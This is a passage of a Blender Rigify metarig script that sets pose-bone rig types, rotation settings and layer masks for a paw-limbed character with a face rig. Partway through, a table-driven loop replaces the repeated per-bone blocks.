bone.roll = 0.6706
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R.002']]
bones['brow.T.R.003'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.use_tail = True
except AttributeError:
pass
try:
pbone.rigify_parameters.tail_pos = 4
except AttributeError:
pass
try:
pbone.rigify_parameters.pivot_pos = 8
except AttributeError:
pass
try:
pbone.rigify_parameters.neck_pos = 10
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, True]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_extra_layers = False
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['pelvis.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['pelvis.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.007']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.008']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.009']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['breast.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['breast.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['toe.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.010']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['front_thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_palm.04.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.01.L']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.04.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.01.R']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.011']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
def _mask(*enabled):
    """Return a 32-entry bone-layer mask with the given indices switched on."""
    return [i in enabled for i in range(32)]

# Per-bone pose configuration, in the original generated order:
# (bone key, rigify type, armature layer to show the bone on,
#  ordered (rigify_parameters attribute, value) overrides).
_pose_bone_table = [
    ('front_shin.L', '', 7, []),
    ('front_shin.R', '', 10, []),
    ('r_pinky.01.L', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_ring.01.L', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_middle.01.L', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_index.01.L', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_pinky.01.R', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_ring.01.R', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_middle.01.R', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('r_index.01.R', 'limbs.simple_tentacle', 5, [('tweak_layers', _mask(6))]),
    ('face', 'faces.super_face', 0, [('secondary_layers', _mask(2))]),
    ('front_foot.L', '', 7, []),
    ('front_foot.R', '', 10, []),
    ('r_pinky.02.L', '', 5, []),
    ('r_ring.02.L', '', 5, []),
    ('r_middle.02.L', '', 5, []),
    ('r_index.02.L', '', 5, []),
    ('r_pinky.02.R', '', 5, []),
    ('r_ring.02.R', '', 5, []),
    ('r_middle.02.R', '', 5, []),
    ('r_index.02.R', '', 5, []),
    ('nose', '', 0, []),
    ('lip.T.L', '', 0, []),
    ('lip.B.L', '', 0, []),
    ('jaw', '', 0, []),
    ('ear.L', '', 0, []),
    ('ear.R', '', 0, []),
    ('lip.T.R', '', 0, []),
    ('lip.B.R', '', 0, []),
    ('brow.B.L', '', 0, []),
    ('lid.T.L', '', 0, []),
    ('brow.B.R', '', 0, []),
    ('lid.T.R', '', 0, []),
    ('forehead.L', '', 0, []),
    ('forehead.R', '', 0, []),
    ('eye.L', '', 0, []),
    ('eye.R', '', 0, []),
    ('cheek.T.L', '', 0, []),
    ('cheek.T.R', '', 0, []),
    ('teeth.T', '', 0, []),
    ('teeth.B', '', 0, []),
    ('tongue', '', 0, []),
    ('front_toe.L', '', 7, [('limb_type', "paw")]),
    ('front_toe.R', '', 10, [('rotation_axis', "x"), ('limb_type', "paw")]),
    ('r_pinky.03.L', '', 5, []),
    ('r_ring.03.L', '', 5, []),
    ('r_middle.03.L', '', 5, []),
    ('r_index.03.L', '', 5, []),
    ('r_pinky.03.R', '', 5, []),
    ('r_ring.03.R', '', 5, []),
    ('r_middle.03.R', '', 5, []),
    ('r_index.03.R', '', 5, []),
    ('nose.001', '', 0, []),
    ('lip.T.L.001', '', 0, []),
    ('lip.B.L.001', '', 0, []),
    ('chin', '', 0, []),
    ('ear.L.001', '', 0, []),
    ('ear.R.001', '', 0, []),
    ('lip.T.R.001', '', 0, []),
    ('lip.B.R.001', '', 0, []),
    ('brow.B.L.001', '', 0, []),
    ('lid.T.L.001', '', 0, []),
    ('brow.B.R.001', '', 0, []),
    ('lid.T.R.001', '', 0, []),
]

# Apply the same unlocked-quaternion setup to every bone, then any
# rig-type-specific parameters.  `pbone` intentionally stays bound to the
# last configured bone afterwards, as in the original generated script.
for _bone_key, _rig_type, _layer, _params in _pose_bone_table:
    pbone = obj.pose.bones[bones[_bone_key]]
    pbone.rigify_type = _rig_type
    pbone.lock_location = (False, False, False)
    pbone.lock_rotation = (False, False, False)
    pbone.lock_rotation_w = False
    pbone.lock_scale = (False, False, False)
    pbone.rotation_mode = 'QUATERNION'
    pbone.bone.layers = _mask(_layer)
    for _attr, _value in _params:
        # Rig types that do not declare this parameter raise AttributeError;
        # skip silently, exactly like the generated try/except blocks did.
        try:
            setattr(pbone.rigify_parameters, _attr, _value)
        except AttributeError:
            pass
pbone = obj.pose.bones[bones['forehead.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.T.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['tongue.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.04.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.01.L']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.04.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.01.R']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
